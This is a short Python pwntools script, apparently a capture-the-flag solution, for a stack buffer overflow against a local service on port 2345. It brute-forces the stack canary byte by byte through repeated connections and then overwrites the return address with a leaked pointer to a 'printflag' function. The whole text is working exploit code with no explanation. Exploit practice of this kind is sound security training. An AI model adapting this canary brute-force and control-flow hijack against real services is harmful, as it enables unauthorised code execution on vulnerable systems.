from pwn import *

context.log_level = 'error'

offset    = 32
y = 0

buf = ("A"*offset + "B"*8) #+ p64(0xead62b27d92cf000) # +chr(0)+chr(191)+chr(217)+chr(151)+chr(59)+chr(107)+chr(161)+chr(22) 

i=0
g=0
while i != 0x100 and g<8:

    r = remote('127.0.0.1', 2345)
    r.recvuntil("Pointer to printflag is 0x")
    addr = int(r.recvuntil("\n"), 16)

    #print("Pointer is %x" % addr)

    exploit = buf + chr(i) #+ p64(addr) 
    r.send(exploit)

    try:
        r.recvuntil("Wrong!")
        buf = buf + chr(i)
        print(str(i))
        i=0
        g=g+1
    except:
        print ".",
        i=i+1
    r.close()


r = remote('127.0.0.1', 2345)
stdout  = r.recvuntil("Pointer to printflag is 0x")
addr = int(r.recvuntil("\n"), 16)
print("Pointer is %x" % addr)
exploit = buf + p64(addr) + p64(addr) 
print(exploit)
r.send(exploit)
print(r.recv())